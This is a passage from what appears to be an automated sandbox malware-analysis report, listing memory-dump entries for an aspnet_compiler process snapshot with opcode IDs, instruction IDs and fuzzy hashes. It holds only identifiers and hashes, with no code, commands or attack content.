                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 653445be42c740b2732e84f41730ee1937372fe8c232585cad8f5ac75df75f1b
                                                              • Instruction ID: 3a0e5878225f0e4efc04a8c6422afe6aa3911d8d633f0f9315e37e042d8d4cf2
                                                              • Opcode Fuzzy Hash: 653445be42c740b2732e84f41730ee1937372fe8c232585cad8f5ac75df75f1b
                                                              • Instruction Fuzzy Hash: D2213531A84781ABF323572CDD48B243B94AF81B70F2803A5FA619B6E2DB6CC905C200
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53fbff78672584371ec222fe4c383fcb78f32a23a08f976e8697652cb4a2566e
                                                              • Instruction ID: 7000a4498aac982587cc26e4678a0dc2c9322db3e4cc16361a81818e4833cc0d
                                                              • Opcode Fuzzy Hash: 53fbff78672584371ec222fe4c383fcb78f32a23a08f976e8697652cb4a2566e
                                                              • Instruction Fuzzy Hash: E221BE39241A41AFCB25DF29CD01B46B7F5FF48708F14846CA90ACBB61E335E842CB94
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb37fd2c6766be81902d895a8f4ddc7272ccea2085fcc6cedc30de37074e3a4c
                                                              • Instruction ID: 8c498a606803ea90dbfead98ad80503031ee2c3e4973ceaee2f8542fcf82b9ea
                                                              • Opcode Fuzzy Hash: fb37fd2c6766be81902d895a8f4ddc7272ccea2085fcc6cedc30de37074e3a4c
                                                              • Instruction Fuzzy Hash: 1E21EBB5E41209ABCB14DFAAD9849AEFBF9FF98610F10012EE409A7240D6709941CB64
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction ID: 0d2e01f71b4a5fb494e19225a80aa7b6b5da099488734cb60b1d267d3ee8e57e
                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction Fuzzy Hash: B8218172900209FFDF129F98CC44B9EBBB9EF84320F214419F914A7251D738DA51CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction ID: cc16e1a77536856e1eb9ad01491a70fd368efa3b524736ea1fa84e5d5635f516
                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction Fuzzy Hash: 8D110473600705BFE7229F58CE41F9ABBB8EB84794F114029F6048B190D675ED84CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5966856658d9d3e44fccb9b1751c209bed8905f27fcf794d09b2064c1c0bb24c
                                                              • Instruction ID: 38edb6c1e739e13fe52d1a0e107555d7638c73a4ce79cea78bbf377fe1e5a0c6
                                                              • Opcode Fuzzy Hash: 5966856658d9d3e44fccb9b1751c209bed8905f27fcf794d09b2064c1c0bb24c
                                                              • Instruction Fuzzy Hash: 3F11C435740611DBDB13CF8DC4C4A2ABBE9AF8A711B19406DEE0D9F205D6B2D901C790
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction ID: c713254f7d352a6734b1c748cb6afe6b2639a3b8e9ab50f77ec72b2b17aa7e68
                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction Fuzzy Hash: 8C217972649A81DFDB329F49C540A66BBF6FB94B10F15883DE94A8B614C730EC01CB80
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1d9b123f281c5987c4808486e0466754cf6a660d9cc833f4ffef1ee9b727815
                                                              • Instruction ID: 755baebdbacb524f3c595cf784af5d78d6ed836ee5d785a396131e0afc0da0b2
                                                              • Opcode Fuzzy Hash: b1d9b123f281c5987c4808486e0466754cf6a660d9cc833f4ffef1ee9b727815
                                                              • Instruction Fuzzy Hash: 83218B35A40206EFCB15CF98C580AAEBBF9FB88318F20456DD109AB311CB71ED06CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4b201773fbdf0f1c2d28ad0c1525f0e10dabc3f7e0bee544785dd1c23cba0f4
                                                              • Instruction ID: dd122b72becd0c2a49ebf5b8e18929bfc66aa1b6995327a8034d61b9c410b719
                                                              • Opcode Fuzzy Hash: e4b201773fbdf0f1c2d28ad0c1525f0e10dabc3f7e0bee544785dd1c23cba0f4
                                                              • Instruction Fuzzy Hash: 7E219075600A01EFD7218F69C841F66B7F8FF84250F08882DE5AEC7250DBB0B840CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9739da5ae14e805bfdfa5190aed97b6693592b3b41cbe8573237b804c071f71
                                                              • Instruction ID: b0efa10197f744731f04154d5ce28d857fb24c84ec4e7d0d2ecb7079171c8a62
                                                              • Opcode Fuzzy Hash: b9739da5ae14e805bfdfa5190aed97b6693592b3b41cbe8573237b804c071f71
                                                              • Instruction Fuzzy Hash: 251108323041149FCF1ADB69DD81A6BB266EBD57B4B294929D927CB290E9309802C790
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d3cf178276fb12a6a431e164432eed045326a8a352cda691b23f05c04bc7706
                                                              • Instruction ID: d24ca9020ea368299b68b862144ae79cc2ce87926701607038629955c09a6004
                                                              • Opcode Fuzzy Hash: 5d3cf178276fb12a6a431e164432eed045326a8a352cda691b23f05c04bc7706
                                                              • Instruction Fuzzy Hash: 3A11E732240905EFE722CB9DCD40F9A77A8EF95750F114025F209DB250D670EE05C790
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ad7f7acae84faaea63edf8c09f497f878c5acd28f24e5f632fd76148a0cc177
                                                              • Instruction ID: 8e8027ce9b7a12c76a8be998ef4377c53445f7beb53c1865bae54e1af3673502
                                                              • Opcode Fuzzy Hash: 8ad7f7acae84faaea63edf8c09f497f878c5acd28f24e5f632fd76148a0cc177
                                                              • Instruction Fuzzy Hash: 2611E376A01205EFCB25CF59C580A5ABBF8EF94610B06407DD90DEB318F6B0DD00CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              • API String ID:
                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction ID: faf9b5cb75cb97e4285ede577d954ae4af8af298b4781c7f4b43810a9b95de30
                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                              • Instruction Fuzzy Hash: F001D832200A419FD7219B69D884FD6B7EEFBC9610F04441DE643CB652DA70F850C754
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd5b208e7e8d4aec693e0d264f4887680c91d0cd075767566eb7517855f3b882
                                                              • Instruction ID: bd7779230685fbf5af4f70a2212dda71c1a09e9f0b874526404778d773e7ca68
                                                              • Opcode Fuzzy Hash: cd5b208e7e8d4aec693e0d264f4887680c91d0cd075767566eb7517855f3b882
                                                              • Instruction Fuzzy Hash: D31157B56083089FC700DF6DC54195BBBE8AF99360F00851EF998D73A4E634E900CBA2
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction ID: 38be14ecfd0e430a79b9f4f9ef73449701957276bd4138ed6cfd41984059703e
                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                              • Instruction Fuzzy Hash: BF017872204680AFE322871DCA48F377BEDEB84754F0E04A9FA09CB6A1D678DC40C725
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c1d6690450842cc87c09ea0ec23de426fe9901d11a81d3643e3c34c7e749972
                                                              • Instruction ID: 60fe9670da7fae09d6d6402f218137b9a67bff5807ec9e6f2d60b6d121b767b1
                                                              • Opcode Fuzzy Hash: 5c1d6690450842cc87c09ea0ec23de426fe9901d11a81d3643e3c34c7e749972
                                                              • Instruction Fuzzy Hash: 3101F731B00A05EBD714EB69DD009BEBBBDFF80650F058429DA06A7645EE20ED01C691
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 52b0e34cce6506df2ca07fa5ee1d031b1dba92373c4851892083f4fe46ad83df
                                                              • Instruction ID: 2362cdadb99a9483863ef01d71bc3b2f4d1c6ca46e08b3ca54352e5d3faf93c4
                                                              • Opcode Fuzzy Hash: 52b0e34cce6506df2ca07fa5ee1d031b1dba92373c4851892083f4fe46ad83df
                                                              • Instruction Fuzzy Hash: 2601A2B1241B01BFD331AF19D944F06BAA8EF55B50F02442EF30A9F390D6B0D9418B54
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d65d6babd7c2683a3888cf9c587513db5451a2697f9d7e6cd8afe343098f297
                                                              • Instruction ID: 09672f60950a80f98c5d82699e982f3c4d72b44bbeca4f0a18a8c144e2344922
                                                              • Opcode Fuzzy Hash: 3d65d6babd7c2683a3888cf9c587513db5451a2697f9d7e6cd8afe343098f297
                                                              • Instruction Fuzzy Hash: BAF0F932A41711B7C732DB56CD44F077EEDEBC4A90F114428B60997600CA30ED01C7A0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction ID: 395b65a75badc446186e084255ba7443ceb02969fdf721c4a6557d91df8d13e8
                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                              • Instruction Fuzzy Hash: CBF0C8B2600615ABD325CF4DDC40E57FBEADBD1B90F058168E515C7224E631ED04CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction ID: c4a8637d6ee567d09070be567e06b9c970db67292fd89513d8d205febcd09af5
                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                              • Instruction Fuzzy Hash: F9F02173254633ABDB32165D8840F6BE5998FE1A64F1A803DF20D9B244CD649D01D7D0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction ID: 21d1378723c6b03373978972f0e9fa7faa0b0fbe6d786ce9c68bc4d517e4370e
                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                              • Instruction Fuzzy Hash: 0501F432244685ABD323971EC805F59BFAAEF91760F0C80A5FE448B6A6D77CC900C310
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 685a5f33ba8127c12b7e3843bcc03099b5eb9bcf5218dbe9d53f60206f7816e5
                                                              • Instruction ID: 1007491ccf8029cd49bde1de06a7959eefeb73c6a29feab6f4600a7959c5be6d
                                                              • Opcode Fuzzy Hash: 685a5f33ba8127c12b7e3843bcc03099b5eb9bcf5218dbe9d53f60206f7816e5
                                                              • Instruction Fuzzy Hash: 23018F71E00259AFDB00DFA9D541AEEBBF8FF58310F14005AE505A7280D738EA01CBA4
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction ID: 8ec37c3ec17e90c9c8a272901eda4b4a80c0e3be4ac6eef662ad998b30f571f2
                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                              • Instruction Fuzzy Hash: 75F0127210001DBFEF019F95DD80DAF7B7DEB552E8B114125FA1592160D635DE21A7A0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07316d2d7ab08b49fabbd9210f42aa30b95ec372b30fba1267c942f121352593
                                                              • Instruction ID: d4afd5553106deec97053b7db9d50bae8536ec53367b75674417d980adefa3cc
                                                              • Opcode Fuzzy Hash: 07316d2d7ab08b49fabbd9210f42aa30b95ec372b30fba1267c942f121352593
                                                              • Instruction Fuzzy Hash: 3201973A111219ABCF129F94DC44EDE7F6AFB4C764F068101FE1A66220C332D971EB81
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df893501325e954624d6b8c9eae1d1dbc870869e9b4fbb0f8d7ccaa42e38f207
                                                              • Instruction ID: da49a46bd4ddbcca5515206fafcc3f1639232def9fa4c8e05adbaf6e10f27681
                                                              • Opcode Fuzzy Hash: df893501325e954624d6b8c9eae1d1dbc870869e9b4fbb0f8d7ccaa42e38f207
                                                              • Instruction Fuzzy Hash: C0F0B4712043616BF71596A99D42F7276DAF7D0752F25C06EEB0D8B2C1E9B1DC01C3A4
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47bbbc22a6a90b5701b9d94ba906390c0eac0459f524b6332b6799f4bdbf86cd
                                                              • Instruction ID: 7945c23e97dcb663813f6d59c42472ee20d498dd690f6344c376084ad8b7a10f
                                                              • Opcode Fuzzy Hash: 47bbbc22a6a90b5701b9d94ba906390c0eac0459f524b6332b6799f4bdbf86cd
                                                              • Instruction Fuzzy Hash: 6F01A470605A819BF322973DCD48B2537B8BB44B54F4C0194FA45CB6EAE778D441C610
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction ID: c9a2e0ad3876e8a895854ea8d7a3b6d6c47c11bf19c86132e5b7ca9c86f19faf
                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                              • Instruction Fuzzy Hash: FBF02735745E1397FB36BB2E9420B2EBAA6EFE4E00B09062C9615CB680DF20DC00D790
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c94ffed09960acbc9ddb4aed79011626ea76ad6aa65e7229067ad2c9e5b3a61
                                                              • Instruction ID: 8ac8a2054969646605249085e728b0a265501c168058fd871cb0253c8944695f
                                                              • Opcode Fuzzy Hash: 7c94ffed09960acbc9ddb4aed79011626ea76ad6aa65e7229067ad2c9e5b3a61
                                                              • Instruction Fuzzy Hash: 07F0A4706057049FC310EF28C541A1BB7E4FF9C720F40465EB898DB394E634E901C756
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction ID: 0524d7de363180f90154996999cd301e179b8b1aec5717885db2a51791b60213
                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                              • Instruction Fuzzy Hash: 22F05477B115529BD722DB4DCC80F16B77CEFD5A60F1A0069AA049B260C760EC01C7D0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction ID: 8b05c542bdce638e32830d840a25628f001b1932333eeababcef6815c11ae0f9
                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                              • Instruction Fuzzy Hash: FEF02472600200EFE315DF21CD00F46B6E9EFDC344F188078A944C7164FAB0ED40C654
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80c5fffa936fb6ca7f74d0090d5cb74b3815506a699bdd63af757abded87929a
                                                              • Instruction ID: 9aca3ff2d010a9a82abf6b6a253aba41f9701401621ce3101b1c9b61cfe0b5b6
                                                              • Opcode Fuzzy Hash: 80c5fffa936fb6ca7f74d0090d5cb74b3815506a699bdd63af757abded87929a
                                                              • Instruction Fuzzy Hash: 61F06271A01249EFCB04EF69C515E6EB7B4FF58300F408059F955EB385DA38EA01CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c31247c727aebafbb9e7faffb6d4614162d9a7398893222de624145923475ec7
                                                              • Instruction ID: be9b165eb4571c7fcb359a79c4482c3c2e98757437949e8c9ebebf4c2bef17da
                                                              • Opcode Fuzzy Hash: c31247c727aebafbb9e7faffb6d4614162d9a7398893222de624145923475ec7
                                                              • Instruction Fuzzy Hash: 8CF09A319166E19FE7238B6CC15CB61BBDC9B00622F09896AD58DC7503C724D880CA52
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 790cd88475f2e04b552003f20d30bd0de0519bb3d19d4eb634f18c8ad46a1835
                                                              • Instruction ID: dccd624389769264ef9870d119bca1795e82a7bcfde86bc000ac8e4dc75b3051
                                                              • Opcode Fuzzy Hash: 790cd88475f2e04b552003f20d30bd0de0519bb3d19d4eb634f18c8ad46a1835
                                                              • Instruction Fuzzy Hash: 22F0EC6E817BC10ACF325B3C7B903D57FA4A755114F591445D4B697205C674A4C3C724
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6fe58ab427b671ed77a3f32044271d6eb00fec66f1f8905c54f735d103144191
                                                              • Instruction ID: b4f145f9c3b14a028b093e64192b46b994d73397aa70fa8ec2f9b2c87dad1dca
                                                              • Opcode Fuzzy Hash: 6fe58ab427b671ed77a3f32044271d6eb00fec66f1f8905c54f735d103144191
                                                              • Instruction Fuzzy Hash: B3E09232100954ABC722BF29DD05F9A77DAEBA4760F014519F11957190CA34A910C784
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction ID: c9d49f1664c1cf6f51dc3bbe9191604897ec8d3ebcd0ca60e2f6b6255fc2f176
                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction Fuzzy Hash: EDE0C2343003168FE715CF19C040B627BBABFD9A20F29C068A9488F305EB36E842CB40
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
